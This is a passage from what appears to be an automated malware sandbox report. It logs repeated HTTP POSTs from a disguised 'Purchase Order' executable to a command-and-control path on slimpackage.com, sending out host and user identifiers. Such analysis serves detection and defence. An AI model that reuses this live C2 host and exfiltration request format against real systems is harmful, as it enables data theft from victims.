                    Jan 14, 2022 07:16:06.043971062 CET4979580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:06.167455912 CET8049795104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:06.174947023 CET8049795104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:06.174989939 CET8049795104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:06.175048113 CET4979580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:06.175106049 CET4979580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:06.297940969 CET8049795104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:07.176011086 CET4979780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:07.325608015 CET8049797104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:07.325831890 CET4979780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:07.332344055 CET4979780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:07.455229998 CET8049797104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:07.455298901 CET4979780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:07.582072020 CET8049797104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:07.593718052 CET8049797104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:07.593730927 CET8049797104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:07.593813896 CET4979780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:07.593858957 CET4979780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:07.717161894 CET8049797104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:08.699098110 CET4980480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:08.821787119 CET8049804104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:08.822550058 CET4980480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:08.825263977 CET4980480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:08.947782993 CET8049804104.223.93.105192.168.2.4

                    UDP Packets


                    DNS Queries


                    DNS Answers


                    HTTP Request Dependency Graph

                    • slimpackage.com

                    HTTP Packets

                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.4 | 49765 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:14.068203926 CET | 1148 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 190
                    Connection: close
                    Jan 14, 2022 07:15:14.192487955 CET | 1148 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: 'ckav.rujones247525DESKTOP-716T771k08F9C4E9C79A3B52B3F739430HiCiQ
                    Jan 14, 2022 07:15:14.326773882 CET | 1149 | IN | HTTP/1.1 404 Not Found
                    Date: Fri, 14 Jan 2022 06:15:13 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    1 | 192.168.2.4 | 49766 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:15.774785995 CET | 1150 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 190
                    Connection: close
                    Jan 14, 2022 07:15:15.897516012 CET | 1246 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: 'ckav.rujones247525DESKTOP-716T771+08F9C4E9C79A3B52B3F739430KHSzU
                    Jan 14, 2022 07:15:16.029309988 CET | 1246 | IN | HTTP/1.1 404 Not Found
                    Date: Fri, 14 Jan 2022 06:15:14 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    10 | 192.168.2.4 | 49775 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:30.454418898 CET | 1345 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:30.577229977 CET | 1345 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:30.710796118 CET | 1345 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:29 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    11 | 192.168.2.4 | 49776 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:31.824330091 CET | 1346 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:31.946741104 CET | 1347 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:32.075763941 CET | 1347 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:30 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    12 | 192.168.2.4 | 49777 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:33.100122929 CET | 1348 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:33.222616911 CET | 1348 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:33.355024099 CET | 1348 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:32 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    13 | 192.168.2.4 | 49778 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:35.394366026 CET | 1350 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:35.520056009 CET | 1363 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:35.667382956 CET | 1372 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:34 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    14 | 192.168.2.4 | 49781 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:37.781119108 CET | 1373 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:37.903804064 CET | 1373 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:38.033628941 CET | 1374 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:36 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    15 | 192.168.2.4 | 49782 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:40.339952946 CET | 1375 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:40.463958979 CET | 1375 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:40.607796907 CET | 1375 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:39 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    16 | 192.168.2.4 | 49783 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:43.210043907 CET | 1376 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:43.332705021 CET | 1376 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:43.464898109 CET | 1376 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:42 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    17 | 192.168.2.4 | 49784 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:44.685173988 CET | 1377 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:44.809154034 CET | 1378 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:44.943876982 CET | 1378 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:43 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    18 | 192.168.2.4 | 49785 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:46.279601097 CET | 1379 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:46.403915882 CET | 1379 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:46.535479069 CET | 1379 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:45 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    19 | 192.168.2.4 | 49786 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:48.680702925 CET | 1380 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:48.805205107 CET | 1380 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:48.940790892 CET | 1381 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:47 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    2 | 192.168.2.4 | 49767 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:17.010469913 CET | 1247 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:17.134681940 CET | 1247 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:17.266379118 CET | 1247 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:16 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    20 | 192.168.2.4 | 49787 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:51.278645992 CET | 1381 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:51.496203899 CET | 1382 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:51.711889029 CET | 1382 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:50 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    21 | 192.168.2.4 | 49788 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:52.910922050 CET | 1383 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:53.033909082 CET | 1383 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:53.164037943 CET | 1383 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:52 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    22 | 192.168.2.4 | 49789 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:54.384953022 CET | 1384 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:54.510684967 CET | 1385 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:54.642054081 CET | 1385 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:53 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    23 | 192.168.2.4 | 49790 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:56.404035091 CET | 1386 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:56.530853033 CET | 1386 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:56.687561035 CET | 1387 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:55 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    24 | 192.168.2.4 | 49791 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:58.873327017 CET | 1388 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:58.997903109 CET | 1388 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:59.129765034 CET | 1388 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:58 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    25 | 192.168.2.4 | 49792 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:16:01.632257938 CET | 1389 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:01.756613016 CET | 1389 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:02.004981041 CET | 1389 | IN | HTTP/1.1 200 OK
